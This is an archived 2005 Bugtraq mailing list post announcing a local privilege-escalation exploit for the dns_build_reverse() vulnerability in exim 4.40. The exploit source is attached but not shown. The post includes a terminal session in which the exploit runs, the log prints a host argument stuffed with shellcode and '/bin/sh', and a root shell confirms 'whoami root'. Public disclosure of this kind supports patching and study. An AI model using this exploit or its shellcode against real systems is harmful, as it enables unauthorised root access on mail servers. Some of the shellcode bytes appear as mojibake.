Bugtraq mailing list archives
exim 4.40 exploit
From: "plugger" <plug () internode on net>
Date: Tue, 24 May 2005 23:12:37 +0950
hello punters, i was bored last night so I coded up a local exploit of the dns_build_reverse() vulnerability in exim 4.40. hope noone minds as it was disclosed 5 months ago. tested on exim 4.40 default build with runtime user as root rather than exim or mail - hence the rootshell. see below for versions and system details. "exploit" attached. regards plug ============ the details ============ plug@bug:~$ uname -a Linux bug 2.6.8-2-686 #1 Mon Jan 24 03:58:38 EST 2005 i686 GNU/Linux plug@bug:~$ /usr/exim/bin/exim -bV Exim version 4.40 #1 built 23-May-2005 22:31:34 Copyright (c) University of Cambridge 2004 Berkeley DB: Sleepycat Software: Berkeley DB 4.2.52: (December 3, 2003) Support for: iconv() Lookups: lsearch wildlsearch nwildlsearch iplsearch dbm dbmnz Authenticators: Routers: accept dnslookup ipliteral manualroute queryprogram redirect Transports: appendfile autoreply pipe smtp Fixed never_users: 0 Configuration file is /usr/exim/configure plug@bug:~$ plug@bug:~$ plug@bug:~$ ./exim-exploit Firing up exim - cross your fingers for shell! **** SMTP testing session as if from host ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿ **** but without any ident (RFC 1413) callback. ó **** This is not for real!
host in host_lookup? yes (matched "*") looking up host name for ::%A:::::::::::::::::1ÀFF V
° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿
IP address lookup using gethostbyaddr() ó IP address lookup failed: h_errno=1
LOG: no host name found for IP address ::%A:::::::::::::::::1ÀFF V ° NÍ1ÛØ@ÍèÜÿÿÿ/bin/shôòÿ¿ sh-2.05b# ó sh-2.05b# sh-2.05b# sh-2.05b# whoami root sh-2.05b# sh-2.05b# exit exit plug@bug:~$
Attachment:
exim-exploit.c
Description:
Current thread:
- exim 4.40 exploit plugger (May 25)